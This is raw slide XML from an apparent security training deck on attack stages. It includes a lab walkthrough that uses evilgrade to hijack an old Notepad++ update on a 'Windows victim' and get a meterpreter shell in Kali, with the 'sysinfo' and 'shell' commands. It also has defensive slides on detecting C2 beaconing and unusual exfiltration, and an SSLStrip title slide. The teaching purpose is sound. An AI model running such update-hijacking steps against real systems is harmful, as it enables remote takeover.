              <a:rPr sz="2400" i="1" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>./evilgrade</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>evilgrade&gt;start</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr sz="2900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>On Windows victim install an older version</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Notepad++</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-65" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(npp.5.8.Installer)</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Run Notepad++ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Help </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>menu </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>select Update  Notepad++</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>should </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>receive a meterpreter shell back in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kali!</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-105" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="5562548"/>
            <a:ext cx="1600200" cy="1274445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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242061" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1503045">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>Command &amp; Control (C2)</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78739" y="1212342"/>
            <a:ext cx="8822055" cy="5062855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="1746885" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3460"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Providing remote access and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-65" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ex-filtrating  information</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3460"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="595"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Look for known C2 files hash, traffic pattern, out</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-135" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of  norm protocols or any other out of norm network  activity for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>detection!</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="34290" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPts val="3460"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="595"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C2 clients are usually beaconing for their servers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-95" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>so  answered or unanswered beacons could reveal their  existence</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="988694" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3460"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="595"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C2 servers are usually establishing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>interactive  connections with clients and receive or drop  contents</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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242061" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2018030">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>Actions on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>Objectives</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78739" y="1206246"/>
            <a:ext cx="8888095" cy="5364480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="541655" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Using compromised user(s) privilege and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>normal  tools to access and exfilterating sensitive  information</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="1164590" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3460"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="645"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Behavioral intrusion detection techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-120" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>are  effective in this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>stage:</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPts val="3190"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Accessing, copying, or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sending unusual </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>number of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-40" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>files</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285">
              <a:lnSpc>
                <a:spcPts val="3190"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>short</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>period</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" marR="5080" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="645"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Having a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>profile </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of normal user behavior is important </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>for  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attack detection at this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>stage!</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="299720" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3460"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Other security solutions such as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>end-point</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>security  products, anti-exploitation, etc. are of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>little </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use at  this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-90" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>stage!</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>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3429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542669" y="3765169"/>
            <a:ext cx="6135370" cy="559435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Actions on Objectives-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SSLStip</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
